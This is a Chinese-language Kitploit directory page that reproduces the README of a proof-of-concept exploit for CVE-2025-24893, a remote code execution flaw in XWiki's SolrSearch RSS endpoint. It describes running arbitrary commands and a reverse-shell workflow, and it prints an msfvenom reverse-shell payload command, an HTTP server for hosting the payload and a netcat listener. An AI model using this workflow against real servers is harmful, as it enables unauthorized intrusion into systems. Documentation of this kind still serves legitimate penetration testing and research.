Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893 — PoC 利用 CVE-2025-24893,这是 XWiki 中因 Groovy 宏在异步渲染时沙箱隔离不当而导致的一个远程代码执行(RCE)漏洞。它允许通过向基于 RSS 的 SolrSearch 端点注入内容来执行任意命令。 | Kitploit
工具/GitHubGitHub/infinit3i/cve-2025-24893
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用命令与控制
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoC 利用 CVE-2025-24893,这是 XWiki 中因 Groovy 宏在异步渲染时沙箱隔离不当而导致的一个远程代码执行(RCE)漏洞。它允许通过向基于 RSS 的 SolrSearch 端点注入内容来执行任意命令。

查看仓库
6121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

XWiki CVE-2025-24893 概念验证

作者: Net.Doge & Infinit3i


CVE-2025-24893 图片



Twitter Follow


该Python脚本利用CVE-2025-24893漏洞——XWiki因异步渲染Groovy宏时沙箱机制不完善导致的远程代码执行(RCE)漏洞。它通过向基于RSS的SolrSearch端点注入代码,实现任意命令执行。

📌 功能特性

  • 通过Groovy注入执行单条命令
  • 自动生成反向Shell载荷(配合msfvenom)
  • 可自定义选项:
    • 远程目标
    • 本地IP地址
    • HTTP服务器端口
    • 反向Shell信标端口
  • 清晰的bash载荷预览
  • 带ANSI颜色编码的交互式TUI

🚀 使用方法

  1. 克隆或下载脚本。

  2. 请确保已安装以下组件:

    • Metasploit中的msfvenom
    • Python 3
    • jq(用于bash载荷)
  3. 运行脚本:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. 从菜单中选择:

    • 运行命令 – 远程执行任意Shell命令。
    • 反向Shell – 生成ELF反向Shell并将其部署到目标。
    • 更改设置 – 修改LHOST、RHOST、服务器端口或信标端口。

🧪 反向Shell工作流程

  1. 生成载荷:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. 系统提示您启动Python HTTP服务器和netcat监听器:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. 脚本向目标发送以下序列:

    • 下载载荷
    • 赋予执行权限
    • 执行二进制文件

⚠️ 免责声明

此工具仅用于教育和授权测试目的。在未拥有或未获得明确许可的系统上使用此工具是非法且不道德的。

📄 参考

  • XWiki
  • MITRE CVE-2025-24893
下载工具